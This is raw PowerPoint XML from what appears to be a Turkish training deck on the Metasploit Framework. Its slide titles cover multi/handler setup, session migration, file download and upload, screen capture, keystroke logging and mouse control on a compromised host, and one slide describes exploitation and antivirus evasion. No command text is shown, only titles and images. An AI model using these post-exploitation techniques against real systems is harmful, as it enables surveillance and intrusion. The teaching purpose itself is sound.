        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="1522413" y="1514475"/>
            <a:ext cx="10569575" cy="64008"/>
            <a:chOff x="1522413" y="1514475"/>
            <a:chExt cx="10569575" cy="64008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="157" name="Serbest Biçimli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8" name="Serbest Biçimli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59" name="Serbest Biçimli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0"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1"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4" name="Alt Bilgi Yer Tutucusu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tarih Yer Tutucusu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{937A487C-0166-4C8B-B4B5-75143DCBCA8D}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slayt Numarası Yer Tutucusu 4"/>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endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Tarih Yer Tutucusu 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{7459CB71-A860-432B-BAE4-95D877574074}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slayt Numarası Yer Tutucusu 3"/>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tr-TR"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin Yer Tutucusu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3" name="İçerik Yer Tutucusu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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="615" name="çerçeve" descr="Kutu grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="4417839" y="1630821"/>
            <a:ext cx="6291028" cy="4575885"/>
            <a:chOff x="4417839" y="1630821"/>
            <a:chExt cx="6291028" cy="4575885"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="616" name="Grup 615"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="invGray">
            <a:xfrm>
              <a:off x="5414491" y="1630821"/>
              <a:ext cx="5294376" cy="4114800"/>
              <a:chOff x="3310555" y="716546"/>
              <a:chExt cx="5294376" cy="4114800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="768" name="Grup 767"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm flipH="1">
                <a:off x="3310555" y="737968"/>
                <a:ext cx="5294376" cy="54864"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="844" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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769" name="Grup 768"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="6492229" y="2755658"/>
                <a:ext cx="4114800" cy="36576"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="770" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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nvGrpSpPr>
            <p:cNvPr id="617" name="Grup 616"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="invGray">
            <a:xfrm rot="10800000">
              <a:off x="4417839" y="2091906"/>
              <a:ext cx="5294376" cy="4114800"/>
              <a:chOff x="3310555" y="716546"/>
              <a:chExt cx="5294376" cy="4114800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="618" name="Grup 617"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm flipH="1">
                <a:off x="3310555" y="737968"/>
                <a:ext cx="5294376" cy="54864"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="694" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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619" name="Grup 618"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="6492229" y="2755658"/>
                <a:ext cx="4114800" cy="36576"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="620" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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9"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0"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1"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2"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3"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DBD3F002-4154-46A0-BF13-8639CE4642BC}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="614" name="çerçeve" descr="Kutu grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm flipH="1">
            <a:off x="1447500" y="1630821"/>
            <a:ext cx="6291028" cy="4575885"/>
            <a:chOff x="4417839" y="1630821"/>
            <a:chExt cx="6291028" cy="4575885"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="615" name="Grup 614"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="invGray">
            <a:xfrm>
              <a:off x="5414491" y="1630821"/>
              <a:ext cx="5294376" cy="4114800"/>
              <a:chOff x="3310555" y="716546"/>
              <a:chExt cx="5294376" cy="4114800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="767" name="Grup 766"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm flipH="1">
                <a:off x="3310555" y="737968"/>
                <a:ext cx="5294376" cy="54864"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="843" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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59"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0"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1"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2"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3"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4"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5"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6"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7"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8"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69"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0"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1"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2"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3"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4"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5"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6"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7"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8"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79"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0"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1"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2"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3"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4"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5"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6"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7"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8"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89"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0"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1"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2"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4"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5"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6"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7"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8"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99"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0"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1"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2"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3"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4"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5"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6"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7"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8"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09"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0"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1"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2"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3"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4"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5"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916"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768" name="Grup 767"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="6492229" y="2755658"/>
                <a:ext cx="4114800" cy="36576"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="769" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2"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3"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4"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5"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6"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7"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8"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79"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0"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1"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2"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3"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4"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5"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6"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7"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8"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89"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0"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1"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2"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3"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4"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5"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6"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7"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8"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99"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0"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1"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2"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3"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4"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5"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6"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7"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8"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09"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0"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1"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2"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3"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4"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5"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6"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7"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8"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1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0"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1"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2"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3"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4"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5"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6"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7"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8"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29"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0"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1"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2"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3"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4"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5"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6"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7"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8"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39"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0"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1"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842"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nvGrpSpPr>
            <p:cNvPr id="616" name="Grup 615"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="invGray">
            <a:xfrm rot="10800000">
              <a:off x="4417839" y="2091906"/>
              <a:ext cx="5294376" cy="4114800"/>
              <a:chOff x="3310555" y="716546"/>
              <a:chExt cx="5294376" cy="4114800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="617" name="Grup 616"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm flipH="1">
                <a:off x="3310555" y="737968"/>
                <a:ext cx="5294376" cy="54864"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="693" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6"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7"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8"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9"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0"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1"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2"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3"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4"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5"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6"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7"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8"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09"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0"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1"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2"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3"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4"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5"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6"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7"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8"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19"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0"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1"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2"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3"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4"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5"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6"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7"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8"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29"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0"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1"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2"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3"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4"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5"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6"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7"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8"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39"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0"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1"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2"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4"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5"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6"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7"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8"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49"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0"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1"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2"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3"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4"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5"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6"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7"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8"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59"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0"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1"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2"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3"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4"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5"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766"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nvGrpSpPr>
              <p:cNvPr id="618" name="Grup 617"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="invGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="6492229" y="2755658"/>
                <a:ext cx="4114800" cy="36576"/>
                <a:chOff x="1522413" y="1514475"/>
                <a:chExt cx="10569575" cy="64008"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="619" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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29" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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39" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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49" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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59" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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69" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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79" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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89" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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692" name="Serbest Biçimli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grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin Yer Tutucusu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CEEA519B-B6A2-41A7-8490-AD20D538F1D3}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021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tr-TR" dirty="0"/>
              <a:t>Asıl başlık stili için tıklatın</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Metin Yer Tutucusu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5" name="Altbilgi Yer Tutucusu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tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Tarih Yer Tutucusu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1F2B68EE-1A79-4A33-AC01-82037DE72111}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slayt Numarası Yer Tutucusu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10.0.2.17/setup"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b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> Framework</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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t>Multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> Ayarları </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Resim 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{709802CD-5118-4923-BB4D-11E68CF39BC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522414" y="1772816"/>
            <a:ext cx="10559081" cy="4250029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220936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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t>Bağlantı Oluştuğu An ve Migration(Göç)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Resim 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DC9D409-BA75-4436-9471-EE6B0B9A3234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543120" y="1772816"/>
            <a:ext cx="9991725" cy="1057275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD1C2F2-6100-407F-89EF-7A93E467AF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543120" y="3212976"/>
            <a:ext cx="8498290" cy="1584176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8634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nchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> İşlemleri</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Resim 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F1FA3D-4C63-4B04-8454-2C713A5BE46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522414" y="2179516"/>
            <a:ext cx="10412367" cy="2498968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410748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10332638" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t>Ekran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Kaydı,Görüntüsü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> ve Klavye Hareketleri</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Resim 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154DF0EA-4615-41D6-BD7F-D98B6E57C0A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522414" y="1912620"/>
            <a:ext cx="9144000" cy="4251959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31420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10332638" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t>Fare Hareketleri</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Resim 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF963743-34FC-4DE8-B64B-AA79931E7442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1529582" y="1844824"/>
            <a:ext cx="9982200" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148825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lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> Nedir?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="İçerik Yer Tutucusu 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Framework güvenlik açıklıklarını bulmak ve bu açıkları sömürmek için kullanılan açık kaynak kodlu bir güvenlik programıdır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Açıkları sömürmenin yanı sıra karşı sistem hakkında bilgi toplama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>antivirüs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazılımları atlama, yapılan saldırı sonucu sistemde işlem yapma gibi işlevler de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>metasploit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framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
